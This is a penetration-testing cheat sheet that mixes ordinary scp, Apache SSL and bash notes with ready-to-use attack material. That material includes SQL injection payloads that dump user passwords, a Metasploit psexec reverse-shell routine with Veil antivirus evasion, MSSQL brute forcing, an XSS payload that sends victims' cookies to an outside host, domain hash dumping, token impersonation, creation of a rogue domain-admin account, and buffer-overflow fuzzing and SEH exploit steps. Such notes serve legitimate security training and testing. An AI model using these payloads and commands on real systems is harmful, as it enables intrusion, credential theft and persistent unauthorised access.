CheatSheet (Short)


[+] Secure Copy (scp) Cheatsheet
[>] Copy remote file to local host:
$ scp [email protected]:<remote_file> /some/local/directory
[>] Copy local file to remote host:
$ scp <local_file> [email protected]:/some/remote/directory
[>] Copy local directory to remote directory:
scp -r <local_dir> [email protected]:/some/remote/directory/<remote_dir>
[>] Copy a file from one remote host to another:
scp [email protected]<host1>:/some/remote/directory/foobar.txt [email protected]<host2>:/some/remote/directory/
[>] Improve scp performance (use blowfish):
scp -c blowfish <local_file> [email protected]:/some/remote/directory

SQL Injection

[+] Union Based SQL Injection
' or 1=1#
1' ORDER BY 10#
1' UNION SELECT version(),2#
1' UNION SELECT version(),database()#
1' UNION SELECT version(),user()#
1' UNION ALL SELECT table_name,2 from information_schema.tables#
1' UNION ALL SELECT column_name,2 from information_schema.columns where table_name = "users"#
1' UNION ALL SELECT concat(user,char(58),password),2 from users#
sqlmap --url="<url>" -p username --user-agent=SQLMAP --threads=10 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs

AV bypass

1. Generate executable using Veil.
2. In msfconsole setup psexec with relevant payload (windows/meterpreter/reverse_tcp)
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST ip
RHOST => ip
msf exploit(psexec) > set SMBUser user
SMBUser => user
msf exploit(psexec) > set SMBPass pass
SMBPass => pass
msf exploit(psexec) > set EXE::Custom /root/Desktop/Misc/Veil-master/payload.exe
EXE::Custom => /root/Desktop/Misc/Veil-master/payload.exe
msf exploit(psexec) > exploit

Apache SSL

# Enabling Self signed certificates on local website
1. Install OpenSSL
sudo apt-get install openssl
2. Run the following command to generate the self signed SSL certificates:
sudo openssl req -x509 -nodes -days 1095 -newkey rsa:2048 -out /etc/ssl/certs/server.crt -keyout /etc/ssl/private/server.key
3. Enable SSL for Apache
sudo a2enmod ssl
4. Put the default-ssl site available creating a symbolic link
sudo ln -s /etc/apache2/sites-available/default-ssl.conf /etc/apache2/sites-enabled/000-default-ssl.conf
5. Edit the file default-ssl.conf
sudo nano /etc/apache2/sites-enabled/000-default-ssl.conf
Change the following lines to point to the certs:
SSLCertificateFile /etc/ssl/certs/server.crt
SSLCertificateKeyFile /etc/ssl/private/server.key
6. Restart Apache
sudo /etc/init.d/apache2 restart
More information:

Attacking MS-SQL

[+] Attacking MSSQL with Metasploit
[>] Enumerate MSSQL Servers on the network:
msf > use auxiliary/scanner/mssql/mssql_ping
nmap -sU --script=ms-sql-info ip ip
Discover more servers using "Browse for More" via Microsoft SQL Server Management Studio.
[>] Bruteforce MSSQL Database:
msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login
[>] Enumerate MSSQL Database:
msf > use auxiliary/admin/mssql/mssql_enum
[>] Gain shell using gathered credentials
msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp

Bash Scripting

Simple Bash Scripting Cheatsheet
[+] nano Shortcuts
ctrl v Next page.
ctrl y Previous page.
ctrl w Where is (find).
ctrl k Cut that line of test.
ctrl x Exit editor.
[+] Create a text file:
touch file Creates an empty file.
ifconfig > tmp pipe the output of a command
nano file
[+] Create a file and append text to it:
ifconfig > tmp
echo >> tmp
ping -c3 >> tmp
[+] How to view a file:
cat file Show entire contents of file.
more file Show one page at a time. Space bar for next page and (q) to exit.
head file Show the first 10 lines.
head -15 file Show the first 15 lines.
tail file Show the last 10 lines.
tail -15 file Show the last 15 lines.
tail -f file Useful when viewing the output of a log file.
[+] pipe
cat tmp | grep Bcast Feeds the output of one process to the input of another process.
[+] Processes
ps aux Show all running process for all users.
kill -9 PID Nicely kill a PID.
[+] Word Count
wc -l tmp2 Count the number of lines in a file
[+] cut
-d delimiter
-f fields
[+] sort
Sort by unique sort -u file
sort IP addresses correct sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n
cat tmp2 | cut -d '(' -f2 | cut -d ')' -f1 | sort -u Isolate the IP address
[+] awk
awk '{print $1}' file Show the 1st column.
awk '{print $1,$5}' file Show the 1st and 5th columns.
[+] grep
grep -v Remove a single string.
grep -v 'red' file
[+] egrep -v
Remove multiple strings egrep -v '(red|white|blue)' file
[+] sed
sed 's/FOO/BAR/g' file Replace FOO with BAR.
sed 's/FOO//g' file Replace FOO with nothing.
sed '/^FOO/d' file Remove lines that start with FOO.
[+] colour
31=red 32=green 33=yellow 34=blue 35=magenta 36=cyan
echo -e "\e[1;34mThis is a blue text.\e[0m"
Bash Scripts
[+] Simple bash script:
print "Hello world."
[+] Make a file executable.
chmod +x file
chmod 755 file
[+] Variables
echo $name
echo $user
echo 'Hello' $name. 'You are running as' $user.
echo "Hello World"
ip=`ifconfig | grep "Bcast:" | cut -d":" -f2 | cut -d" " -f1`
echo "Hello" $name "Your IP address is:" $ip
[+] User Input
read -p "Domain: " domain
echo "Please input your domain:"
read -p "Domain:" domain
ping -c 5 $domain
[+] Check For No User Input
if [ -z $domain ]; then
echo "#########################"
echo "Invalid choice."
[+] For loops
for host in $(cat hosts.txt)
command $host
[+] One Liners
Port Scan:
for port in $(cat Ports.txt); do nc -nzv ip $port & sleep 0.5; done


CTF Notes
# Enumerate Users via Finger
# Show nfs shares available
showmount -e ip
# User nfspysh to mount share and create .ssh directory
nfspysh -o server=ip:/home/user
mkdir .ssh
cd .ssh
# Generate ssh key pair
cp /tmp/authorized_keys
# Transfer attacker public key to host
put /tmp/authorized_keys
# Login to SSH server with no password
SSH_AUTH_SOCK=0 ssh [email protected]

Cookie Stealing

[+] Cookie Stealing:
[-] Start Web Service
python -m SimpleHTTPServer 80
[-] Use one of the following XSS payloads:
<script>new Image().src="http://ip/index.php?c="+document.cookie;</script>

Domain Admin Exploitation

[+] After compromising a Windows machine:
[>] List the domain administrators:
From Shell - net group "Domain Admins" /domain
[>] Dump the hashes (Metasploit)
msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE
[>] Find the admins (Metasploit)
spool /tmp/enumdomainusers.txt
msf > use auxiliary/scanner/smb/smb_enumusers_domain
msf > set smbuser Administrator
msf > set smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf > set rhosts ip/24
msf > set threads 8
msf > run
msf> spool off
[>] Compromise Admin's box
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token MYDOM\\adaministrator
meterpreter > getuid
meterpreter > shell
C:\> whoami
C:\> net user hacker /add /domain
C:\> net group "Domain Admins" hacker /add /domain


Exploit Development Cheatsheet
[+] Fuzzing:
import socket
buffer = ["A"]
counter = 50
while len(buffer) <= 1000:
buffer.append("A" * counter)
counter = counter + 50
for buffstring in buffer:
print "Fuzzing:" + str(len(buffstring))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect( ("", 5555) )
[+] Bad Character Testing:
[+] Structured Exception Handler (SEH) Exploitation notes
- Crash the application
- Check SEH overwirte (view-seh chain)
- Find offset (!mona pattern_create <length>)
- Find certain SEH references to the cyclic pattern (!mona findmsp)
- Verify offset to NSEH (Next Exception)
- Find POP/POP/RET address with mona (!mona seh -cpb <bad chars>)
- Add short jump into payload to jump ofver SEH ("\xeb\x06" + 2 bytes of padding)
- Add shellcode to the payload
- Ensure existing padding to make sure the crash still happens.